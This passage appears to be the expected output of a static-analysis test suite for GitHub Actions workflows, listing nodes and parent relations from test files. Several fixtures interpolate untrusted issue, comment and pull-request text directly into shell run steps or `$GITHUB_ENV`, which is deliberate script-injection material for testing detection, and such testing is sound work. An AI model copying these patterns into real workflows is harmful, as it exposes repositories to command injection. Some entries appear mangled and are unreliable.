.github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:17:16:17:19 | bash | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ 
steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:4:3:5:21 | run: | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:4:3:5:21 | run: | .github/workflows/commands.yml:4:3:5:21 | run: | +| .github/workflows/commands.yml:5:12:5:20 | bash -wkf | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:5:12:5:20 | bash -wkf | .github/workflows/commands.yml:4:3:5:21 | run: | +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:14:9:26 | ubuntu-latest | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:14:9:26 | ubuntu-latest | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:1:1:39:30 | on: push | +| 
.github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:11:7:13:4 | run: | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:11:7:13:4 | run: | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | 
.github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | 
.github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:32:14:32:26 | ubuntu-latest | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:32:14:32:26 | ubuntu-latest | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| 
.github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| 
.github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo 
'${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| 
.github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | 
.github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << 
EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| 
.github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| 
.github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | 
.github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | 
